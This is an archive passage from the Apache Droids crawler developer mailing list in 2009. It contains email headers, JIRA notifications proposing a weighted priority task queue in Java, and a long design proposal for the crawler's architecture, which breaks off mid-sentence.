bh=A+BG16xPnbnFXCLaBSUNm9NijVhK/5P3Ghd0bYJ/ZZg=; b=Yj4NpPE6TyxN86gxNY6yJMXYpGuYlNM1/BYO4if33N7mmJIqmDq+QGmCKG+Leo+fcr cdd+liumSlP2tfNp5M2o3F9l7/SRIS7So+YFeE8EVhxHyqDbrLoVSH+UXhNBZR6sbenI 4acidEt9Lx01fK4t9mdwus0li5oF+yD1EUg5g= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:mime-version:subject:date:references :x-mailer; b=Q2D2n3mPVuNdArAnQ/RnfUh+HHmzxNCnT0DJPnK4Za7HGX0qvf0amwm7X8m/+YaxcM HOkw05GEb0SZXGelfdXNZImu3cqHWbqstWoCc1w/jGZNxDqwE4s3fcZm7Lke0IKi+Mzx WB5gJ6O2+okU1J37ciuKf3ZksRbwGaIfZVs8I= Received: by 161.129.204.104 with SMTP id 7mr2324814agy.21.1245433044735; Fri, 19 Jun 2009 10:37:24 -0700 (PDT) Received: from ?161.129.204.104? ([161.129.204.104]) by mx.google.com with ESMTPS id 34sm2553447agc.39.2161.129.204.104.37.24 (version=TLSv1/SSLv3 cipher=RC4-MD5); Fri, 19 Jun 2009 10:37:24 -0700 (PDT) Message-Id: <[email protected]> From: Ryan McKinley <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v935.3) Subject: Re: Notes for running Droids in Google App Engine Date: Fri, 19 Jun 2009 13:37:22 -0400 References: <[email protected]> <[email protected]> X-Mailer: Apple Mail (2.935.3) X-Virus-Checked: Checked by ClamAV on apache.org > > to utilize GAE, Droids has to be refactored in a way that the > fetch-parse-extraction code be refactored to an isolated interface, > without > using HttpClient. It's much easier to use Spring. If anyone want to > try > that, I could create a DroidsWebService(s) module. > +1 here From [email protected] Sun Jun 21 12:17:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18251 invoked from network); 21 Jun 2009 12:17:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2009 12:17:56 -0000 Received: (qmail 17173 invoked by uid 500); 21 Jun 2009 12:18:07 -0000 Delivered-To: [email protected] Received: (qmail 17105 invoked by uid 500); 21 Jun 2009 12:18:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17086 invoked by uid 99); 21 Jun 2009 12:18:07 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 21 Jun 2009 12:18:07 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO qw-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 21 Jun 2009 12:17:59 +0000 Received: by qw-out-1920.google.com with SMTP id 9so1376818qwj.54 for <multiple recipients>; Sun, 21 Jun 2009 05:17:38 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:cc:content-type; bh=rnDXyJRHGrTi1BCd2jR/eF0GzWEyZl9X+mIgglsnOXU=; b=kfIE4UnRWXPu/9nVrBBe65ajtCzJeEfKyeHq5e7r+3rGAdpk47lahSrVfEmE0HzKB3 yQhSXY3wtOyDrV7KOjWt6QerArksBOMlpVBk3IpZBz0pP0q97hsqcjoAlApy8kGZ+DyU xJI5Y8ChZKoOgxjsakvnqzObeK57NvLZaKfNQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; b=xo9kZYBobptsairnKtWgmE8GMnYJt11yv56oJFMqjlj3CHZ0pedNl9iqGESbLtEumg NoxVkVqwmhc76GhE3rLe0mYu29SJ6wHDViajF4MFt9hs3Jc4+tGvLMmdo9veRkbxXf+p FkhojFYsjqoJNgPjJQ+FF+vufU4Ml7bZacuBU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id m18mr3523708vcn.50.1245586658120; Sun, 21 Jun 2009 05:17:38 -0700 (PDT) In-Reply-To: <1245321167.6354.12.camel@panic> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <1245321167.6354.12.camel@panic> Date: Sun, 21 Jun 2009 20:17:38 +0800 Message-ID: <[email protected]> Subject: Re: Crawler From: Mingfai <[email protected]> To: [email protected] Cc: [email protected] Content-Type: multipart/alternative; boundary=0016e647560e4b5592046cdabe92 X-Virus-Checked: Checked by ClamAV on apache.org --0016e647560e4b5592046cdabe92 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit On Thu, Jun 18, 2009 at 6:32 PM, Thorsten Scherler < [email protected]> wrote: > On Wed, 2009-06-17 at 13:14 +0100, Ross Gardler wrote: > > [cc'd to droids list for info since I'm a mentor there too] > > > > 2009/6/17 Robert Burrell Donkin <[email protected]>: > > > Ross Gardler wrote: > > >> 2009/6/17 Robert Burrell Donkin <[email protected] > >: > > >>> i made a start on a crawler module yesterday to make it easier to > > >>> download all releases from an URL. > > >> > > >> Why not use Droids? > > >> > > >> http://incubator.apache.org/droids/ > > > > > > in terms of downloading tech... > > > > > > i did consider looking into droids but couldn't find a release and it > > > required jdk 1.6 so concluded that it's not an immediate option (i > > > needed something right away) > > > > Fair enough, maybe the Droids people will be prompted into makind a > > release (JDK1.5 preferably) > > We are planing a release soonish I once wrote some 1.4 downward > compilation with ant and retrotranslator (see > http://svn.apache.org/viewvc/incubator/droids/trunk/build.xml?view=co). > However meanwhile we switched to maven and I have not looked into the > integration of retrotranslator in maven. > I don't like to restrict to Java 5 but as a framework/library, it's good to support Java 5. For 1.4, I somehow think it's too much. but if the retrotranslator will work magically, there is no harm to support it. how does the retrotranslator work? do we need to avoid coding against any Java 6 interface if we want to make Droids JDK 5 compatible? I suppose we didn't depend on Java 6 yet. We should be able to use XML Streaming (StAX) without Java 6. regards, mingfai --0016e647560e4b5592046cdabe92-- From [email protected] Mon Jun 22 04:50:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87840 invoked from network); 22 Jun 2009 04:50:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2009 04:50:27 -0000 Received: (qmail 32771 invoked by uid 500); 22 Jun 2009 04:50:38 -0000 Delivered-To: [email protected] Received: (qmail 32720 invoked by uid 500); 22 Jun 2009 04:50:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32710 invoked by uid 99); 22 Jun 2009 04:50:37 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 04:50:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 04:50:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 58171234C004 for <[email protected]>; Sun, 21 Jun 2009 21:50:07 -0700 (PDT) Message-ID: <1932137795.1245646207345.JavaMail.jira@brutus> Date: Sun, 21 Jun 2009 21:50:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-48) Support prioritizing in the TaskQueue In-Reply-To: <31962839.1240139927532.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-48?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12722486#action_12722486 ] Mingfai Ma commented on DROIDS-48: ---------------------------------- just come up with a event better design for weight. Weighted interface {code} public interface Weighted { public int getWeight(); } {code} The Link/LinkTask, assume extends HashMap {code} public class WeightedLink extends Link implements Weighted { //or LinkTask public int getWeight() { return Integer.parseInt(String.valueOf(this.get("weight"))); } } {code} WeightComparator : {code} public class WeightComparator implements Comparator { public int compare(Object link1, Object link2) { int weight1 = link1 instanceof Weighted ? ((Weighted) link1).getWeight() : 0; int weight2 = link2 instanceof Weighted ? ((Weighted) link2).getWeight() : 0; return weight2 - weight1; } } {code} Task Queue {code} Queue queue = new PriorityBlockingQueue(10, new WeightComparator()) {code} so, weighted becomes optional. if user want to support weight, then, they implement Weighted and let the user decide how to weight. > Support prioritizing in the TaskQueue > ------------------------------------- > > Key: DROIDS-48 > URL: https://issues.apache.org/jira/browse/DROIDS-48 > Project: Droids > Issue Type: New Feature > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-48d.patch, DROIDS-48d2.patch > > > Use case: > - when looping a directory, (imagine someone is too stupid and dunno the dmoz database can be downloaded and try to crawl it with Droids) we got collect a lot of links that will be handled later. assume the requirement is to fetch dmoz directory +1 link outside dmoz.org, In the original mechanism, it will keep adding new links to the TaskQueue. Ideally, there should be a mechanism to give a higher priority to the non-dmoz.org links, so when non-dmoz links are added, they are processed first, and be removed from the TaskQueue asap. > with the patch in DROIDS-47, a constructor is added to the SimpleTaskQueue to support a custom Queue. This issue suggests to change the SimpleTaskQueue to use a PriorityBlockingQueue by default, and add a getWeight to the Task interface > I'm also thinking about a more complex TaskQueue. to be discussed in the mail list later. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Jun 22 04:52:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88037 invoked from network); 22 Jun 2009 04:52:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2009 04:52:27 -0000 Received: (qmail 33017 invoked by uid 500); 22 Jun 2009 04:52:38 -0000 Delivered-To: [email protected] Received: (qmail 32971 invoked by uid 500); 22 Jun 2009 04:52:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32961 invoked by uid 99); 22 Jun 2009 04:52:37 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 04:52:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 04:52:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 87FE2234C004 for <[email protected]>; Sun, 21 Jun 2009 21:52:07 -0700 (PDT) Message-ID: <197462462.1245646327542.JavaMail.jira@brutus> Date: Sun, 21 Jun 2009 21:52:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Issue Comment Edited: (DROIDS-48) Support prioritizing in the TaskQueue In-Reply-To: <31962839.1240139927532.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-48?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12722486#action_12722486 ] Mingfai Ma edited comment on DROIDS-48 at 6/21/09 9:50 PM: ----------------------------------------------------------- just come up with a even better design for weight. Weighted interface {code} public interface Weighted { public int getWeight(); } {code} The Link/LinkTask, assume extends HashMap {code} public class WeightedLink extends Link implements Weighted { //or LinkTask public int getWeight() { return Integer.parseInt(String.valueOf(this.get("weight"))); } } {code} WeightComparator : {code} public class WeightComparator implements Comparator { public int compare(Object link1, Object link2) { int weight1 = link1 instanceof Weighted ? ((Weighted) link1).getWeight() : 0; int weight2 = link2 instanceof Weighted ? ((Weighted) link2).getWeight() : 0; return weight2 - weight1; } } {code} Task Queue {code} Queue queue = new PriorityBlockingQueue(10, new WeightComparator()) {code} so, weighted becomes optional. if user want to support weight, then, they implement Weighted and let the user decide how to weight. was (Author: mingfai): just come up with a event better design for weight. Weighted interface {code} public interface Weighted { public int getWeight(); } {code} The Link/LinkTask, assume extends HashMap {code} public class WeightedLink extends Link implements Weighted { //or LinkTask public int getWeight() { return Integer.parseInt(String.valueOf(this.get("weight"))); } } {code} WeightComparator : {code} public class WeightComparator implements Comparator { public int compare(Object link1, Object link2) { int weight1 = link1 instanceof Weighted ? ((Weighted) link1).getWeight() : 0; int weight2 = link2 instanceof Weighted ? ((Weighted) link2).getWeight() : 0; return weight2 - weight1; } } {code} Task Queue {code} Queue queue = new PriorityBlockingQueue(10, new WeightComparator()) {code} so, weighted becomes optional. if user want to support weight, then, they implement Weighted and let the user decide how to weight. > Support prioritizing in the TaskQueue > ------------------------------------- > > Key: DROIDS-48 > URL: https://issues.apache.org/jira/browse/DROIDS-48 > Project: Droids > Issue Type: New Feature > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-48d.patch, DROIDS-48d2.patch > > > Use case: > - when looping a directory, (imagine someone is too stupid and dunno the dmoz database can be downloaded and try to crawl it with Droids) we got collect a lot of links that will be handled later. assume the requirement is to fetch dmoz directory +1 link outside dmoz.org, In the original mechanism, it will keep adding new links to the TaskQueue. Ideally, there should be a mechanism to give a higher priority to the non-dmoz.org links, so when non-dmoz links are added, they are processed first, and be removed from the TaskQueue asap. > with the patch in DROIDS-47, a constructor is added to the SimpleTaskQueue to support a custom Queue. This issue suggests to change the SimpleTaskQueue to use a PriorityBlockingQueue by default, and add a getWeight to the Task interface > I'm also thinking about a more complex TaskQueue. to be discussed in the mail list later. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Jun 22 04:54:24 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88332 invoked from network); 22 Jun 2009 04:54:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2009 04:54:24 -0000 Received: (qmail 33842 invoked by uid 500); 22 Jun 2009 04:54:35 -0000 Delivered-To: [email protected] Received: (qmail 33795 invoked by uid 500); 22 Jun 2009 04:54:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33785 invoked by uid 99); 22 Jun 2009 04:54:35 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 04:54:35 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 04:54:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B62F7234C004 for <[email protected]>; Sun, 21 Jun 2009 21:54:07 -0700 (PDT) Message-ID: <233637898.1245646447732.JavaMail.jira@brutus> Date: Sun, 21 Jun 2009 21:54:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Issue Comment Edited: (DROIDS-48) Support prioritizing in the TaskQueue In-Reply-To: <31962839.1240139927532.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-48?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12722486#action_12722486 ] Mingfai Ma edited comment on DROIDS-48 at 6/21/09 9:52 PM: ----------------------------------------------------------- just come up with a even better design for weight. Weighted interface {code} public interface Weighted { public int getWeight(); } {code} The Link/LinkTask, assume extends HashMap {code} public class WeightedLink extends Link implements Weighted { //or LinkTask public int getWeight() { return Integer.parseInt(String.valueOf(this.get("weight"))); } } {code} WeightComparator : {code} public class WeightComparator implements Comparator { public int compare(Object link1, Object link2) { int weight1 = link1 instanceof Weighted ? ((Weighted) link1).getWeight() : 0; int weight2 = link2 instanceof Weighted ? ((Weighted) link2).getWeight() : 0; return weight2 - weight1; } } {code} Task Queue {code} Queue queue = new PriorityBlockingQueue(10, new WeightComparator()) {code} so, weighted becomes optional. if user want to support weight, then, they implement Weighted and let the user decide how to weight. p.s. I'm designing a filter framework that work at a broader sense than URL filter. The Weighted interface is actually designed to cater the ordering of Filter as well. was (Author: mingfai): just come up with a even better design for weight. Weighted interface {code} public interface Weighted { public int getWeight(); } {code} The Link/LinkTask, assume extends HashMap {code} public class WeightedLink extends Link implements Weighted { //or LinkTask public int getWeight() { return Integer.parseInt(String.valueOf(this.get("weight"))); } } {code} WeightComparator : {code} public class WeightComparator implements Comparator { public int compare(Object link1, Object link2) { int weight1 = link1 instanceof Weighted ? ((Weighted) link1).getWeight() : 0; int weight2 = link2 instanceof Weighted ? ((Weighted) link2).getWeight() : 0; return weight2 - weight1; } } {code} Task Queue {code} Queue queue = new PriorityBlockingQueue(10, new WeightComparator()) {code} so, weighted becomes optional. if user want to support weight, then, they implement Weighted and let the user decide how to weight. > Support prioritizing in the TaskQueue > ------------------------------------- > > Key: DROIDS-48 > URL: https://issues.apache.org/jira/browse/DROIDS-48 > Project: Droids > Issue Type: New Feature > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-48d.patch, DROIDS-48d2.patch > > > Use case: > - when looping a directory, (imagine someone is too stupid and dunno the dmoz database can be downloaded and try to crawl it with Droids) we got collect a lot of links that will be handled later. assume the requirement is to fetch dmoz directory +1 link outside dmoz.org, In the original mechanism, it will keep adding new links to the TaskQueue. Ideally, there should be a mechanism to give a higher priority to the non-dmoz.org links, so when non-dmoz links are added, they are processed first, and be removed from the TaskQueue asap. > with the patch in DROIDS-47, a constructor is added to the SimpleTaskQueue to support a custom Queue. This issue suggests to change the SimpleTaskQueue to use a PriorityBlockingQueue by default, and add a getWeight to the Task interface > I'm also thinking about a more complex TaskQueue. to be discussed in the mail list later. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Jun 22 15:41:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54730 invoked from network); 22 Jun 2009 15:41:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2009 15:41:18 -0000 Received: (qmail 68185 invoked by uid 500); 22 Jun 2009 15:41:29 -0000 Delivered-To: [email protected] Received: (qmail 68143 invoked by uid 500); 22 Jun 2009 15:41:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68104 invoked by uid 99); 22 Jun 2009 15:41:27 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 15:41:27 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO qw-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 22 Jun 2009 15:41:19 +0000 Received: by qw-out-1920.google.com with SMTP id 9so1643110qwj.54 for <[email protected]>; Mon, 22 Jun 2009 08:40:58 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=SHrBxOsIOY9q8ra11sgddcqpMEEiAsOwR1OpY3t3f1Q=; b=QhDs2HxgvjnAjxAspgAz74S3DwgHapkq1ELRPacWShg2jZfpz2z5y5Lac6WxQYSneG GgU4rTVjSD7LvSMdgj1gcYvYv9cjeaNzJJGpBC9TruUAnwOjSizFtXDN/8ArlTUngqbs jtNTCKDjHuskL7cjX5+QJ9OSXxhD8QRYCKvkc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=MncVBF6jcTMGjDeQOBfqnc/WIj3YfZf34jhCiPtzIMadvvSoU+QZX3LegPGZWsOSX8 0ag7WKzB627gByK5yxScQEqJLmkI4BVTrxcvfsQdzmAs0LcgotceogyQYV/EODIg93a+ f0sEvFg7MCkgrGbSuU0PNKH0N5RZ5K3C0/nTA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id t13mr4018073vcn.31.1245685257741; Mon, 22 Jun 2009 08:40:57 -0700 (PDT) Date: Mon, 22 Jun 2009 23:40:57 +0800 Message-ID: <[email protected]> Subject: some proposed ideas for Droids From: Mingfai <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e646a4004a3f45046cf1b334 X-Virus-Checked: Checked by ClamAV on apache.org --0016e646a4004a3f45046cf1b334 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit hi, I am some proposed idea for discussion. Some of them are design principles or concept, and some are more concrete points about design on specific items. The points are as follows: * - indicate items that I consider as major changes ** 1. Use of Java Package - do not use a org.apache.droids.api package. Just put the API interface in individual package. - do not use *.impl unless there are 3 or more. (i don't really have strong opinion at this point, just don't like to have some impl package with just one or two class(es)) 2. General coding practice/standard - use protected instead of private by default. This will allow users to extend and replace any of our class easier. - do not use final for LinkTask/Link. I have a use case that I want to extend Link/LinkTask as a JPA Entity Bean. And JPA doesn't allow a class without default constructor, i.e. we can't final the URL field. For the classes that are not expected to be subclassed by users, it's ok to use final. - Use Java standard interface rather than introducing our own interface unless there are obvious value-added. e.g. replace TaskQueue with java.util.Queue<Task> - *Use Spring for droids-core - i.e. allow droids-core depends on Spring - a droid needs a whole object graph to work. as a framework, we want different components be configurable. It's better to rely on an IoC framework to manage the dependency and configuration. Spring is the most popular IoC framework. it will also make testing much easier. and user needs not to change code (but to change xml) if they want to change certain behavior of our core classes. - there are some special benefits of using spring, e.g. it supports annotation and autowiring. Take an example, I could define a field like "@Autowired Collection<Filter> filters", and when I add a new filter, then, i create 2 classes like "@Component public class XXXFilter", and in runtime, the filters field will be injected with a collection of the 2 classes. It makes development and configuration real simple. (and there are also ways to change the autowiring behavior) - Spring facilitates the use of http remoting. And it is easy to replace implementation class to do remoting or other interception. 3. Specific concept/component. Some of the points in this section are just my comment to the concept, but not any proposal for action. - Droids/Crawler - Our top level concept. We only use Droid but not Crawler. I use the generic term Crawler in this message. - Link, LinkTask, Task - Task is a valid concept. A task is the unit that work by the worker. A link refer to the link only. I have no objection to this concept. But in implementation, it seems there is no much need to implement the Task concept. (naming an interface as "nextTask" is ok but it seems no need to have a class or interface called "Task") - a crawler works with links.and we don't normally non-link related task that goes beyond the scope of a crawler framework. - See the Link-centric design bullet for more info about link - Fetcher - we do not use the concept of Fetcher now. I suppose it is because Droids is designed to do more than web crawling and non-web resource is not "fetched"? In Droids 0.01, Protocol basically represent the Fetcher (or at least, Protocol+Worker) - I strongly think we should use the term and concept of Fetcher because it is a common terminology in crawler. Using common terms and language makes our design more intuitive. - Parser, Handler, Processor, Extractor etc. these are terms that share very similar meaning. No matter how we use them, we need to give a strict definition, e.g. in class level JavaDoc comment. My suggestions: - Parser - the component that process the raw fetched Entity. Output data is subject to implementation. One Entity will be parsed by one parser only. - Extractor - the component to extract out link from entity. Multiple extractors could be used for a parser. the primary function is to extract out link. user may also use it to do other extraction or operation, e.g. to store data in the Link, or just consume the parsed data. A extract depends directly to a parser. (we can't easily define a contract between Parser and Extractor, so let's do not attempt this.) Extractor is a new concept. It is splitted from Parser and diff in a way that each link shall be parsed once, and multiple extractor may perform extraction or custom operation against the parsed data. I think i mentioned in another email before. Say when we use NekoHtmlParser, we want to parse just once, and maybe extractor1 is for extracting outlink, and extractor2 is for custom processing (such as indexing) and both are based on the same parsed data. - Processor - too vague. do not use this concept, and we are not using it anyway. - Handler - for event based Parser, it may use a SAX DefaultHandler. To avoid confusion, let's not to use handler in other context. - Entity - I don't have any strong proposal and this section is just to brainstorm some ideas. It would be good to clarify what we want to achieve in providing an Entity hierarchy, given that, the HC project actually provides all the Entity already. Our entity is kind of a wrapper with buffer.(and HC also have buffered entity) I guess we don't want to depend on HttpEntity from HC directly as Droids may touch entity beyond HttpEntity, e.g. File (but HC also as FileEntity...) - Entity is the contract between Fetcher/Protocol and Parser. For Entity, it's unlikely the user need to subclass it. if they need to subclass it, they also need to implement a Fetcher/Protocol + Parser. The value of sub-classing Entity is not significant. I suggest we just not design it for subclassing. - Currently, we have a hierarchy of ManagedContentEntity, ContentEntity, FileContentEntity, HttpContentEntity. For a file parser and a http parser, they can't easily use a common Entity interface and I suppose the parser implementation has to cast the entity. To me, "ManagedContentEntity" doesn't give a lot of meaning than "Entity". FileEntity and HttpEntity does make a different to me in concept, but i don't see how they could be related in implementation. - My initial thought about the contract of parse is whether it can just take a InputStream. And later i find it is necessary to have a concept of Entity that hold information like content/mime type, encoding/charset, size/length etc. But diff kind of entity just may have different attribute and it's not easy to define a comment contract. One of the ideas in my mind is to use a single final Entity class that extend HashMap. - For HttpEntity, i do prefer to have a way to retrieve the original HC HttpEntity object. (but it is unlikely we want to expose that in any interface) Notice that the wrapping make it a bit more complex in constructing instance in unit test. - Worker, Task, TaskMaster - Make worker implements Runnable, Future.(and not RunnableFuture for JDK5 compataibility) and we use run() as its main interface. So it could be use as a thread easier. - I suggest to remove the concept of Task and TaskMaster. A Droid/Crawler could do most work of the TaskMaster. These concepts also confuse with Thread, ThreadFactory, Executor, that creates many similar concepts. - if we keep TaskMaster, i suggest to make it implements ExecutorService, and we depends on Java util/concurrency API rather than a TaskMaster interface. - Queue - I suggest to remove the TaskQueue interface and use Queue<? extends Link> as standard signature. 4. Link-centric design - Link, extends HashMap, will act as a main arbitary data container, and a vehicle that store attributes and data thoughout the whole lifecycle of fetching, parsing, and extracting. - if we do it extremely, all data can be stored as in the Link and all interface could just use a single Link argument, e.g. parse(Link), extract(Link). For sure it is not a good idea. So i make every interface to include the Link argument as well as key component. I found the extreme usage is good in remote web service api, but not good in Java API. - All components to be generic as <? extends Link>, user may use another Link implementation for the whole Droid operation. an example is a WeightedLink. - For a Link, only the URL is mandatory. A ID is needed for implementing an in-memory set/hashtable to reject duplicated Link quickly. I suggest to make Link a class so people could create a link with new Link(" http://www.apache.org") easily, just like creating URL or URI. 5. Non-thread safe interface and fluent API - take an example, insteaad of "Parse parse()", i suggest the parser to store the parsed data inside itself, and we provide a reset() method to clear the data for re-use. This design has pro and con. - one of main pro is, we could simplify the model by omitting a Parse class that is mainly for holding arbitrary data. And we also can't easily define the return type of an interface. Take Fetcher as an example, a fetcher typically contain a Request and Response object. Should we have fetch() to return a FetchedData that has request, response, and entity? it's just a bit complex. - I hope no one against Fluent API :-). with fluent api, it's like "public Fetcher fetch()". And I don't always use Fluent Api, only use when it is good and the api call may be chained. e.g. parser.parse().getDate() 6. Factory and LinkMatcher design - For worker, fetcher and parser, they are provided by users as a Factory. - For FetcherFactory and ParserFactory, new instance are created with a newXXX(Link link) - So, depends on the Link, the Factory will provide diff components. e.g. for http link, it's a HttpFetcher, for File, it's a file fetcher (not impl.) for parer, it consults the content type. - Every component implemnets a LinkMatcher interface that checks if a Fecher/Parser/Extractor supports a particular link. This is primary for automatic component registration without a need to explicitly providing a mapping upfront. e.g. there might be a PNG parser that checks the "contentType" attribute of the Link. The parser implemented the matches() method. so we don't need to maintain a mapping hashmap between contentType and parser. The link matching may be complex so it's hard to use a mapping hashmap anyway. together with the filter framework, any attribute could be prepared by a filter first, so the factory could always rely on the matcher interface to find the correct parser/fetcher. 7. *Filter Framework - This is a significant new concept. I propose to have a filter framework that works as a chain for intercepting the works of every main component. There are a main lifecycle filter that is named Filter, and also individual component filters such as FetchFilter and ParseFilter. Lifecycle filter is called by a Worker. Some works may not support it, e.g. my 